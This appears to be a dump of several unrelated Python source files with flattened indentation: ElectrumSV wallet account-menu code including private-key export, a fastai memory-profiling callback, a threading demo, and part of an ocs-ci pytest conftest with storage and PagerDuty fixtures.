def _on_current_item_changed(self, item: QListWidgetItem, last_item: QListWidgetItem) -> None:
account_id = item.data(Qt.UserRole)
# This should update the internal tracking, and also the active wallet account.
if self._update_active_account(account_id):
account = self._main_window._wallet.get_account(account_id)
self._update_window_account(account)
def _update_active_account(self, account_id: int) -> bool:
if account_id == self._current_account_id:
return False
self._current_account_id = account_id
return True
def _update_window_account(self, account: AbstractAccount) -> None:
self._main_window.set_active_account(account)
def get_tab_widget(self) -> QTabWidget:
return self._tab_widget
def _initialize_account_list(self) -> None:
self._selection_list.clear()
self._account_ids.clear()
# TODO(rt12): These should respect user ordering, and perhaps also later hierarchy.
for account in self._wallet.get_accounts():
self._add_account_to_list(account)
if len(self._account_ids):
self._selection_list.setCurrentRow(0)
currentItem = self._selection_list.currentItem()
account_id = currentItem.data(Qt.UserRole)
if self._update_active_account(account_id):
account = self._main_window._wallet.get_account(account_id)
self._update_window_account(account)
def _add_account_to_list(self, account: AbstractAccount) -> None:
account_id = account.get_id()
item = QListWidgetItem()
keystore = account.get_keystore()
derivation_type = keystore.derivation_type if keystore is not None \
else DerivationType.NONE
is_watching_only = keystore.is_watching_only() if keystore is not None else True
icon_state = "inactive" if is_watching_only else "active"
if derivation_type == DerivationType.ELECTRUM_MULTISIG:
tooltip_text = _("Multi-signature account")
icon_filename = "icons8-group-task-80-blueui-{}.png"
elif derivation_type == DerivationType.HARDWARE:
tooltip_text = _("Hardware wallet account")
icon_filename = "icons8-usb-2-80-blueui-{}.png"
elif derivation_type == DerivationType.IMPORTED:
# This should not be watch only, as only imported public keys lack a keystore.
tooltip_text = _("Imported private key account")
icon_filename = "icons8-key-80-plus-blueui-{}.png"
elif derivation_type == DerivationType.ELECTRUM_OLD:
tooltip_text = _("Old-style Electrum account")
icon_filename = "icons8-password-1-80-blueui-{}.png"
elif derivation_type == DerivationType.BIP32:
tooltip_text = _("BIP32 account")
icon_filename = "icons8-grand-master-key-80-blueui-{}.png"
else:
# This should always be watch only as imported public keys have no keystore.
tooltip_text = _("Imported public key account")
icon_filename = "icons8-key-80-plus-blueui-{}.png"
if is_watching_only:
tooltip_text += f" ({_('watch only')})"
item.setIcon(read_QIcon(icon_filename.format(icon_state)))
item.setData(Qt.UserRole, account_id)
item.setText(account.display_name())
item.setToolTip(tooltip_text)
self._selection_list.addItem(item)
self._account_ids.append(account_id)
def _show_account_menu(self, position) -> None:
item = self._selection_list.currentItem()
if not item:
return
account_id = item.data(Qt.UserRole)
account = self._wallet.get_account(account_id)
menu = QMenu()
self.add_menu_items(menu, account, self._main_window)
menu.exec_(self._selection_list.viewport().mapToGlobal(position))
def add_menu_items(self, menu: QMenu, account: AbstractAccount, main_window: ElectrumWindow) \
-> None:
menu.clear()
# This expects a reference to the main window, not the weakref.
account_id = account.get_id()
menu.addAction(_("&Information"),
partial(self._show_account_information, account_id))
seed_menu = menu.addAction(_("View &Secured Data"),
partial(self._view_secured_data, main_window=main_window, account_id=account_id))
seed_menu.setEnabled(self._can_view_secured_data(account))
menu.addAction(_("&Rename"),
partial(self._rename_account, account_id))
menu.addSeparator()
private_keys_menu = menu.addMenu(_("&Private keys"))
import_menu = private_keys_menu.addAction(_("&Import"), partial(self._import_privkey,
main_window=main_window, account_id=account_id))
import_menu.setEnabled(account.can_import_privkey())
export_menu = private_keys_menu.addAction(_("&Export"), partial(self._export_privkeys,
main_window=main_window, account_id=account_id))
export_menu.setEnabled(account.can_export())
if account.can_import_address():
menu.addAction(_("Import addresses"), partial(self._import_addresses, account_id))
menu.addSeparator()
hist_menu = menu.addMenu(_("&History"))
hist_menu.addAction("Export", main_window.export_history_dialog)
labels_menu = menu.addMenu(_("&Labels"))
action = labels_menu.addAction(_("&Import"),
partial(self._on_menu_import_labels, account_id))
labels_menu.addAction(_("&Export"), partial(self._on_menu_export_labels, account_id))
invoices_menu = menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), partial(self._on_menu_import_invoices, account_id))
payments_menu = menu.addMenu(_("Payments"))
ed_action = payments_menu.addAction(_("Export destinations"),
partial(self._generate_destinations, account_id))
keystore = account.get_keystore()
ed_action.setEnabled(keystore is not None and
keystore.type() != KeystoreType.IMPORTED_PRIVATE_KEY)
def _on_menu_import_labels(self, account_id: int) -> None:
self._main_window.do_import_labels(account_id)
def _on_menu_export_labels(self, account_id: int) -> None:
self._main_window.do_export_labels(account_id)
def _on_menu_import_invoices(self, account_id: int) -> None:
send_view = self._main_window.get_send_view(account_id)
send_view.import_invoices()
def _rename_account(self, account_id: int) -> None:
account = self._main_window._wallet.get_account(account_id)
new_account_name = line_dialog(self, _("Rename account"), _("Account name"), _("OK"),
account.get_name())
if new_account_name is None:
return
account.set_name(new_account_name)
account_row = self._account_ids.index(account_id)
item: QListWidgetItem = self._selection_list.item(account_row)
item.setText(new_account_name)
def _show_account_information(self, account_id: int) -> None:
dialog = AccountDialog(self._main_window, self._wallet, account_id, self)
dialog.exec_()
def _generate_destinations(self, account_id) -> None:
from . import payment_destinations_dialog
from importlib import reload
reload(payment_destinations_dialog)
dialog = payment_destinations_dialog.PaymentDestinationsDialog(self._main_window,
self._wallet, account_id, self)
dialog.exec_()
def _can_view_secured_data(self, account: AbstractAccount) -> bool:
return not account.is_watching_only() and not isinstance(account, MultisigAccount) \
and not account.involves_hardware_wallet() \
and account.type() != AccountType.IMPORTED_PRIVATE_KEY
@protected
def _view_secured_data(self, main_window: ElectrumWindow, account_id: int=-1,
password: Optional[str]=None) -> None:
# account_id is a keyword argument so that 'protected' can identify the correct wallet
# window in which to make the password request.
account = self._wallet.get_account(account_id)
if self._can_view_secured_data(account):
keystore = account.get_keystore()
from .secured_data_dialog import SecuredDataDialog
d = SecuredDataDialog(self._main_window, self, keystore, password)
d.exec_()
else:
MessageBox.show_message(_("This type of account has no secured data. You are advised "
"to manually back up this wallet."), self._main_window.reference())
@protected
def _import_privkey(self, main_window: ElectrumWindow, account_id: int=-1,
password: Optional[str]=None) -> None:
# account_id is a keyword argument so that 'protected' can identify the correct wallet
# window in which to make the password request.
account = self._wallet.get_account(account_id)
title, msg = _('Import private keys'), _("Enter private keys")
self._main_window._do_import(title, msg,
lambda x: account.import_private_key(x, password))
def _import_addresses(self, account_id: int) -> None:
account = self._wallet.get_account(account_id)
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
address = address_from_string(addr)
if account.import_address(address):
return addr
# Show duplicate addition same as good addition.
return addr
self._main_window._do_import(title, msg, import_addr)
@protected
def _export_privkeys(self, main_window: ElectrumWindow, account_id: int=-1,
password: Optional[str]=None) -> None:
account = self._wallet.get_account(account_id)
if isinstance(account, MultisigAccount):
MessageBox.show_message(
_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.')
)
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "\n".join([
_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties.")
])
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrumsv-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(main_window.config, defaultname,
select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
keyinstance_ids = account.get_keyinstance_ids()
done = False
cancelled = False
def privkeys_thread():
for keyinstance_id in keyinstance_ids:
time.sleep(0.1)
if done or cancelled:
break
privkey = account.export_private_key(keyinstance_id, password)
script_template = account.get_script_template_for_id(keyinstance_id)
script_text = script_template_to_string(script_template)
private_keys[script_text] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join('{}\t{}'.format(script_text, privkey)
for script_text, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText(
"Please wait... %d/%d" % (len(private_keys),len(keyinstance_ids))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self._do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("ElectrumSV was unable to produce a private key-export."),
str(reason)
])
MessageBox.show_error(txt, title=_("Unable to create csv"))
except Exception as e:
MessageBox.show_message(str(e), main_window.reference())
return
MessageBox.show_message(_('Private keys exported'), main_window.reference())
def _do_export_privkeys(self, fileName: str, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["reference", "private_key"])
for key_text, pk in pklist.items():
transaction.writerow([key_text, pk])
else:
f.write(json.dumps(pklist, indent=4))
|
mem.py
|
" Memory profiling callbacks "
import tracemalloc, threading, torch, time, pynvml
from ..utils.mem import *
from ..vision import *
#from ..basic_train import Learner, LearnerCallback
def preload_pytorch():
torch.ones((1, 1)).cuda()
def gpu_mem_get_used_no_cache():
torch.cuda.empty_cache()
return gpu_mem_get().used
def gpu_mem_used_get_fast(gpu_handle):
info = pynvml.nvmlDeviceGetMemoryInfo(gpu_handle)
return int(info.used/2**20)
if torch.cuda.is_available():
preload_pytorch()
pynvml.nvmlInit()
# XXX: to be migrated to docs:
# usage:
# learn = create_cnn(data, model, metrics=[accuracy], callback_fns=PeakMemMetric)
# learn.fit_one_cycle(3, max_lr=1e-2)
#
# output:
# Total time: 00:59
# epoch train_loss valid_loss accuracy cpu used peak gpu used peak
# 1 0.325806 0.070334 0.978800 0 2 80 6220
# 2 0.093147 0.038905 0.987700 0 2 2 914
# 3 0.047818 0.027617 0.990600 0 2 0 912
class PeakMemMetric(LearnerCallback):
"Callback that measures used and peaked general and GPU memory."
_order=-20 # Needs to run before the recorder
def __init__(self, learn:Learner):
super().__init__(learn)
assert torch.cuda.is_available(), "pytorch CUDA is required"
def peak_monitor_start(self):
self.peak_monitoring = True
# start RAM tracing
tracemalloc.start()
# this thread samples RAM usage as long as the current epoch of the fit loop is running
peak_monitor_thread = threading.Thread(target=self.peak_monitor_func)
peak_monitor_thread.daemon = True
peak_monitor_thread.start()
def peak_monitor_stop(self):
tracemalloc.stop()
self.peak_monitoring = False
def peak_monitor_func(self):
self.gpu_mem_used_peak = -1
gpu_id = torch.cuda.current_device()
gpu_handle = pynvml.nvmlDeviceGetHandleByIndex(gpu_id)
while True:
gpu_mem_used = gpu_mem_used_get_fast(gpu_handle)
self.gpu_mem_used_peak = max(gpu_mem_used, self.gpu_mem_used_peak)
if not self.peak_monitoring: break
time.sleep(0.001) # 1msec
def on_train_begin(self, **kwargs):
self.learn.recorder.add_metric_names(['cpu used', 'peak', 'gpu used', 'peak'])
def on_epoch_begin(self, **kwargs):
self.peak_monitor_start()
self.gpu_before = gpu_mem_get_used_no_cache()
def on_epoch_end(self, **kwargs):
cpu_current, cpu_peak = list(map(lambda x: int(x/2**20), tracemalloc.get_traced_memory()))
gpu_current = gpu_mem_get_used_no_cache() - self.gpu_before
gpu_peak = self.gpu_mem_used_peak - self.gpu_before
self.peak_monitor_stop()
# The numbers are deltas in MBs (beginning of the epoch and the end)
self.learn.recorder.add_metrics([cpu_current, cpu_peak, gpu_current, gpu_peak])
|
mtsleepD3.py
|
#!/usr/bin/env python
import threading
from time import sleep, ctime
loops = [4, 2]
class ThreadFunc(object):
def __init__(self, func, args, name=''):
self.name = name
self.func = func
self.args = args
def __call__(self):
self.func(*self.args)
def loop(nloop, nsec):
print('start loop', nloop, 'at:', ctime())
sleep(nsec)
print('loop', nloop, 'done at:', ctime())
def main():
print('starting at:', ctime())
threads = []
nloops = list(range(len(loops)))
for i in nloops: # create all threads
t = threading.Thread(
target=ThreadFunc(loop, (i, loops[i]),
loop.__name__))
threads.append(t)
for i in nloops: # start all threads
threads[i].start()
for i in nloops: # wait for completion
threads[i].join()
print('all DONE at:', ctime())
if __name__ == '__main__':
main()
|
conftest.py
|
import logging
import os
import random
import time
import tempfile
import threading
from concurrent.futures.thread import ThreadPoolExecutor
from datetime import datetime
from math import floor
from shutil import copyfile
from functools import partial
from botocore.exceptions import ClientError
import pytest
from collections import namedtuple
from ocs_ci.deployment import factory as dep_factory
from ocs_ci.framework import config
from ocs_ci.framework.pytest_customization.marks import (
deployment,
ignore_leftovers,
tier_marks,
ignore_leftover_label,
)
from ocs_ci.ocs import constants, defaults, fio_artefacts, node, ocp, platform_nodes
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.exceptions import (
CommandFailed,
TimeoutExpiredError,
CephHealthException,
ResourceWrongStatusException,
UnsupportedPlatformError,
PoolDidNotReachReadyState,
StorageclassNotCreated,
PoolNotDeletedFromUI,
StorageClassNotDeletedFromUI,
)
from ocs_ci.ocs.mcg_workload import mcg_job_factory as mcg_job_factory_implementation
from ocs_ci.ocs.node import get_node_objs, schedule_nodes
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pvc
from ocs_ci.ocs.utils import setup_ceph_toolbox, collect_ocs_logs
from ocs_ci.ocs.resources.backingstore import (
backingstore_factory as backingstore_factory_implementation,
)
from ocs_ci.ocs.resources.namespacestore import (
namespace_store_factory as namespacestore_factory_implementation,
)
from ocs_ci.ocs.resources.bucketclass import (
bucket_class_factory as bucketclass_factory_implementation,
)
from ocs_ci.ocs.resources.cloud_manager import CloudManager
from ocs_ci.ocs.resources.cloud_uls import (
cloud_uls_factory as cloud_uls_factory_implementation,
)
from ocs_ci.ocs.node import check_nodes_specs
from ocs_ci.ocs.resources.mcg import MCG
from ocs_ci.ocs.resources.objectbucket import BUCKET_MAP
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.resources.pod import (
get_rgw_pods,
delete_deploymentconfig_pods,
get_pods_having_label,
get_deployments_having_label,
Pod,
)
from ocs_ci.ocs.resources.pvc import PVC, create_restore_pvc
from ocs_ci.ocs.version import get_ocs_version, report_ocs_version
from ocs_ci.ocs.cluster_load import ClusterLoad, wrap_msg
from ocs_ci.utility import (
aws,
deployment_openshift_logging as ocp_logging_obj,
ibmcloud,
kms as KMS,
pagerduty,
reporting,
templating,
users,
version,
)
from ocs_ci.utility.environment_check import (
get_status_before_execution,
get_status_after_execution,
)
from ocs_ci.utility.flexy import load_cluster_info
from ocs_ci.utility.kms import is_kms_enabled
from ocs_ci.utility.prometheus import PrometheusAPI
from ocs_ci.utility.uninstall_openshift_logging import uninstall_cluster_logging
from ocs_ci.utility.utils import (
ceph_health_check,
ceph_health_check_base,
get_ocs_build_number,
get_running_ocp_version,
get_openshift_client,
get_system_architecture,
get_testrun_name,
load_auth_config,
ocsci_log_path,
skipif_ocp_version,
skipif_ocs_version,
TimeoutSampler,
skipif_upgraded_from,
update_container_with_mirrored_image,
skipif_ui_not_support,
)
from ocs_ci.helpers import helpers
from ocs_ci.helpers.helpers import (
create_unique_resource_name,
create_ocs_object_from_kind_and_name,
setup_pod_directories,
get_current_test_name,
)
from ocs_ci.ocs.bucket_utils import get_rgw_restart_counts
from ocs_ci.ocs.pgsql import Postgresql
from ocs_ci.ocs.resources.rgw import RGW
from ocs_ci.ocs.jenkins import Jenkins
from ocs_ci.ocs.amq import AMQ
from ocs_ci.ocs.elasticsearch import ElasticSearch
from ocs_ci.ocs.ui.base_ui import login_ui, close_browser
from ocs_ci.ocs.ui.block_pool import BlockPoolUI
from ocs_ci.ocs.ui.storageclass import StorageClassUI
from ocs_ci.ocs.couchbase_new import CouchBase
log = logging.getLogger(__name__)
class OCSLogFormatter(logging.Formatter):
def __init__(self):
fmt = (
"%(asctime)s - %(threadName)s - %(levelname)s - %(name)s.%(funcName)s.%(lineno)d "
"- %(message)s"
)
super(OCSLogFormatter, self).__init__(fmt)
def pytest_logger_config(logger_config):
logger_config.add_loggers([""], stdout_level="info")
logger_config.set_log_option_default("")
logger_config.split_by_outcome()
logger_config.set_formatter_class(OCSLogFormatter)
def pytest_collection_modifyitems(session, items):
"""
A pytest hook to filter out skipped tests satisfying
skipif_ocs_version, skipif_upgraded_from or skipif_no_kms
Args:
session: pytest session
items: list of collected tests
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
# Add squad markers to each test item based on filepath
for item in items:
# check, if test already have squad marker manually assigned
if any(map(lambda x: "_squad" in x.name, item.iter_markers())):
continue
for squad, paths in constants.SQUADS.items():
for _path in paths:
# Limit the test_path to the tests directory
test_path = os.path.relpath(item.fspath.strpath, constants.TOP_DIR)
if _path in test_path:
item.add_marker(f"{squad.lower()}_squad")
item.user_properties.append(("squad", squad))
break
if not (teardown or deploy or (deploy and skip_ocs_deployment)):
for item in items[:]:
skipif_ocp_version_marker = item.get_closest_marker("skipif_ocp_version")
skipif_ocs_version_marker = item.get_closest_marker("skipif_ocs_version")
skipif_upgraded_from_marker = item.get_closest_marker(
"skipif_upgraded_from"
)
skipif_no_kms_marker = item.get_closest_marker("skipif_no_kms")
skipif_ui_not_support_marker = item.get_closest_marker(
"skipif_ui_not_support"
)
if skipif_ocp_version_marker:
skip_condition = skipif_ocp_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocp_version(skip_condition[0]):
log.info(
f"Test: {item} will be skipped due to OCP {skip_condition}"
)
items.remove(item)
continue
if skipif_ocs_version_marker:
skip_condition = skipif_ocs_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocs_version(skip_condition[0]):
log.info(f"Test: {item} will be skipped due to {skip_condition}")
items.remove(item)
continue
if skipif_upgraded_from_marker:
skip_args = skipif_upgraded_from_marker.args
if skipif_upgraded_from(skip_args[0]):
log.info(
f"Test: {item} will be skipped because the OCS cluster is"
f" upgraded from one of these versions: {skip_args[0]}"
)
items.remove(item)
if skipif_no_kms_marker:
try:
if not is_kms_enabled():
log.info(
f"Test: {item} it will be skipped because the OCS cluster"
f" has not configured cluster-wide encryption with KMS"
)
items.remove(item)
except KeyError:
log.warning(
"Cluster is not yet installed. Skipping skipif_no_kms check."
)
if skipif_ui_not_support_marker:
skip_condition = skipif_ui_not_support_marker
if skipif_ui_not_support(skip_condition.args[0]):
log.info(
f"Test: {item} will be skipped due to UI test {skip_condition.args} is not available"
)
items.remove(item)
continue
# skip UI test on openshift dedicated ODF-MS platform
if (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
or config.ENV_DATA["platform"].lower() == constants.ROSA_PLATFORM
):
for item in items.copy():
if "/ui/" in str(item.fspath):
log.info(
f"Test {item} is removed from the collected items"
f" UI is not supported on {config.ENV_DATA['platform'].lower()}"
)
items.remove(item)
@pytest.fixture()
def supported_configuration():
"""
Check that cluster nodes have enough CPU and Memory as described in:
https://access.redhat.com/documentation/en-us/red_hat_openshift_container_storage/4.2/html-single/planning_your_deployment/index#infrastructure-requirements_rhocs
This fixture is intended as a prerequisite for tests or fixtures that
run flaky on configurations that don't meet minimal requirements.
Minimum requirements for each starting node (OSD+MON):
16 CPUs
64 GB memory
Last documentation check: 2020-02-21
"""
min_cpu = constants.MIN_NODE_CPU
min_memory = constants.MIN_NODE_MEMORY
log.info("Checking if system meets minimal requirements")
if not check_nodes_specs(min_memory=min_memory, min_cpu=min_cpu):
err_msg = (
f"At least one of the worker nodes doesn't meet the "
f"required minimum specs of {min_cpu} vCPUs and {min_memory} RAM"
)
pytest.xfail(err_msg)
@pytest.fixture(scope="session", autouse=True)
def auto_load_auth_config():
try:
auth_config = {"AUTH": load_auth_config()}
config.update(auth_config)
except FileNotFoundError:
pass # If auth file doesn't exist we just ignore.
@pytest.fixture(scope="class")
def secret_factory_class(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="session")
def secret_factory_session(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="function")
def secret_factory(request):
return secret_factory_fixture(request)
def secret_factory_fixture(request):
"""
Secret factory. Calling this fixture creates a new secret.
RBD based is default.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(interface=constants.CEPHBLOCKPOOL):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
"""
secret_obj = helpers.create_secret(interface_type=interface)
assert secret_obj, "Failed to create a secret"
instances.append(secret_obj)
return secret_obj
def finalizer():
"""
Delete the RBD secrets
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
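# Usage sketch (hypothetical test, not part of this conftest): request the
# fixture and call it to obtain a secret object; the finalizer above deletes
# it during teardown.
#
#     def test_example(secret_factory):
#         secret = secret_factory(interface=constants.CEPHFILESYSTEM)
#         assert secret.name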
@pytest.fixture(scope="session", autouse=True)
def log_ocs_version(cluster):
"""
Fixture handling version reporting for OCS.
This fixture handles alignment of the version reporting, so that we:
* report version for each test run (no matter if just deployment, just
test or both deployment and tests are executed)
* prevent conflict of version reporting with deployment/teardown (eg. we
should not run the version logging before actual deployment, or after
a teardown)
Version is reported in:
* log entries of INFO log level during test setup phase
* ocs_version file in cluster path directory (for copy pasting into bug
reports)
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
dev_mode = config.RUN["cli_params"].get("dev_mode")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
if teardown and not deploy:
log.info("Skipping version reporting for teardown.")
return
elif dev_mode:
log.info("Skipping version reporting for development mode.")
return
elif skip_ocs_deployment:
log.info("Skipping version reporting since OCS deployment is skipped.")
return
cluster_version, image_dict = get_ocs_version()
file_name = os.path.join(
config.ENV_DATA["cluster_path"], "ocs_version." + datetime.now().isoformat()
)
with open(file_name, "w") as file_obj:
report_ocs_version(cluster_version, image_dict, file_obj)
log.info("human readable ocs version info written into %s", file_name)
@pytest.fixture(scope="session")
def pagerduty_service(request):
"""
Create a Service in PagerDuty service. The service represents a cluster instance.
The service is deleted at the end of the test run.
Returns:
str: PagerDuty service json
"""
if config.ENV_DATA["platform"].lower() in constants.MANAGED_SERVICE_PLATFORMS:
pagerduty_api = pagerduty.PagerDutyAPI()
payload = pagerduty_api.get_service_dict()
service_response = pagerduty_api.create("services", payload=payload)
msg = f"Request {service_response.request.url} failed"
assert service_response.ok, msg
service = service_response.json().get("service")
def teardown():
"""
Delete the service at the end of test run
"""
service_id = service["id"]
log.info(f"Deleting service with id {service_id}")
delete_response = pagerduty_api.delete(f"services/{service_id}")
msg = f"Deletion of service {service_id} failed"
assert delete_response.ok, msg
request.addfinalizer(teardown)
return service
else:
log.info(
"PagerDuty service is not created because "
f"platform from {constants.MANAGED_SERVICE_PLATFORMS} "
"is not used"
)
return None
@pytest.fixture(scope="session", autouse=True)
def pagerduty_integration(request, pagerduty_service):
"""
Create a new Pagerduty integration for service from pagerduty_service
fixture if it doesn't exist. Update ocs-converged-pagerduty secret with
correct integration key. This is currently applicable only for ODF
Managed Service.
"""
if config.ENV_DATA["platform"].lower() in constants.MANAGED_SERVICE_PLATFORMS:
service_id = pagerduty_service["id"]
pagerduty_api = pagerduty.PagerDutyAPI()
log.info(
"Looking if Prometheus integration for pagerduty service with id "
f"{service_id} exists"
)
integration_key = None
for integration in pagerduty_service.get("integrations"):
if integration["summary"] == "Prometheus":
log.info(
"Prometheus integration already exists. "
"Skipping creation of new one."
)
integration_key = integration["integration_key"]
break
if not integration_key:
payload = pagerduty_api.get_integration_dict("Prometheus")
integration_response = pagerduty_api.create(
f"services/{service_id}/integrations", payload=payload
)
msg = f"Request {integration_response.request.url} failed"
assert integration_response.ok, msg
integration = integration_response.json().get("integration")
integration_key = integration["integration_key"]
pagerduty.set_pagerduty_integration_secret(integration_key)
def update_pagerduty_integration_secret():
"""
Make sure that pagerduty secret is updated with correct integration
token. Check value of config.RUN['thread_pagerduty_secret_update']:
* required - secret is periodically updated to correct value
* not required - secret is not updated
* finished - thread is terminated
"""
while config.RUN["thread_pagerduty_secret_update"] != "finished":
if config.RUN["thread_pagerduty_secret_update"] == "required":
pagerduty.set_pagerduty_integration_secret(integration_key)
time.sleep(60)
config.RUN["thread_pagerduty_secret_update"] = "not required"
thread = threading.Thread(
target=update_pagerduty_integration_secret,
name="thread_pagerduty_secret_update",
)
def finalizer():
"""
Stop the thread that executed update_pagerduty_integration_secret()
"""
config.RUN["thread_pagerduty_secret_update"] = "finished"
if thread:
thread.join()
request.addfinalizer(finalizer)
thread.start()
@pytest.fixture(scope="class")
def ceph_pool_factory_class(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="session")
def ceph_pool_factory_session(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="function")
def ceph_pool_factory(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
def ceph_pool_factory_fixture(request, replica=3, compression=None):
"""
Create a Ceph pool factory.
Calling this fixture creates new Ceph pool instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL, replica=replica, compression=compression
):
if interface == constants.CEPHBLOCKPOOL:
ceph_pool_obj = helpers.create_ceph_block_pool(
replica=replica, compression=compression
)
elif interface == constants.CEPHFILESYSTEM:
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
).get(defaults.CEPHFILESYSTEM_NAME)
ceph_pool_obj = OCS(**cfs)
assert ceph_pool_obj, f"Failed to create {interface} pool"
if interface != constants.CEPHFILESYSTEM:
instances.append(ceph_pool_obj)
return ceph_pool_obj
def finalizer():
"""
Delete the Ceph block pool
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def storageclass_factory_class(request, ceph_pool_factory_class, secret_factory_class):
return storageclass_factory_fixture(
request, ceph_pool_factory_class, secret_factory_class
)
@pytest.fixture(scope="session")
def storageclass_factory_session(
request, ceph_pool_factory_session, secret_factory_session
):
return storageclass_factory_fixture(
request, ceph_pool_factory_session, secret_factory_session
)
@pytest.fixture(scope="function")
def storageclass_factory(request, ceph_pool_factory, secret_factory):
return storageclass_factory_fixture(request, ceph_pool_factory, secret_factory)
def storageclass_factory_fixture(
request,
ceph_pool_factory,
secret_factory,
):
"""
Create a storage class factory. Default is RBD based.
Calling this fixture creates new storage class instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
secret=None,
custom_data=None,
sc_name=None,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
replica=3,
compression=None,
new_rbd_pool=False,
pool_name=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
secret (object): An OCS instance for the secret.
custom_data (dict): If provided then storageclass object is created
by using these data. Parameters `block_pool` and `secret`
are not used but references are set if provided.
sc_name (str): Name of the storage class
replica (int): Replica size for a pool
compression (str): Compression type option for a pool
new_rbd_pool (bool): True if user wants to create new rbd pool for SC
pool_name (str): Existing pool name to create the storageclass other
than the default rbd pool.
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface is CephBlockPool
encrypted (bool): True to enable RBD PV encryption
encryption_kms_id (str): Key value of vault config to be used from
csi-kms-connection-details configmap
Returns:
object: helpers.create_storage_class instance with links to
block_pool and secret.
"""
if custom_data:
sc_obj = helpers.create_resource(**custom_data)
else:
secret = secret or secret_factory(interface=interface)
if interface == constants.CEPHBLOCKPOOL:
if config.ENV_DATA.get("new_rbd_pool") or new_rbd_pool:
pool_obj = ceph_pool_factory(
interface=interface,
replica=config.ENV_DATA.get("replica") or replica,
compression=config.ENV_DATA.get("compression") or compression,
)
interface_name = pool_obj.name
else:
if pool_name is None:
interface_name = helpers.default_ceph_block_pool()
else:
interface_name = pool_name
elif interface == constants.CEPHFILESYSTEM:
interface_name = helpers.get_cephfs_data_pool_name()
sc_obj = helpers.create_storage_class(
interface_type=interface,
interface_name=interface_name,
secret_name=secret.name,
sc_name=sc_name,
reclaim_policy=reclaim_policy,
rbd_thick_provision=rbd_thick_provision,
encrypted=encrypted,
encryption_kms_id=encryption_kms_id,
)
assert sc_obj, f"Failed to create {interface} storage class"
sc_obj.secret = secret
instances.append(sc_obj)
return sc_obj
def finalizer():
"""
Delete the storageclass
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def project_factory_class(request):
return project_factory_fixture(request)
@pytest.fixture(scope="session")
def project_factory_session(request):
return project_factory_fixture(request)
@pytest.fixture()
def project_factory(request):
return project_factory_fixture(request)
@pytest.fixture()
def project(project_factory):
"""
This fixture creates a single project instance.
"""
project_obj = project_factory()
return project_obj
def project_factory_fixture(request):
"""
Create a new project factory.
Calling this fixture creates new project.
"""
instances = []
def factory(project_name=None):
"""
Args:
project_name (str): The name for the new project
Returns:
object: ocs_ci.ocs.resources.ocs instance of 'Project' kind.
"""
proj_obj = helpers.create_project(project_name=project_name)
instances.append(proj_obj)
return proj_obj
def finalizer():
delete_projects(instances)
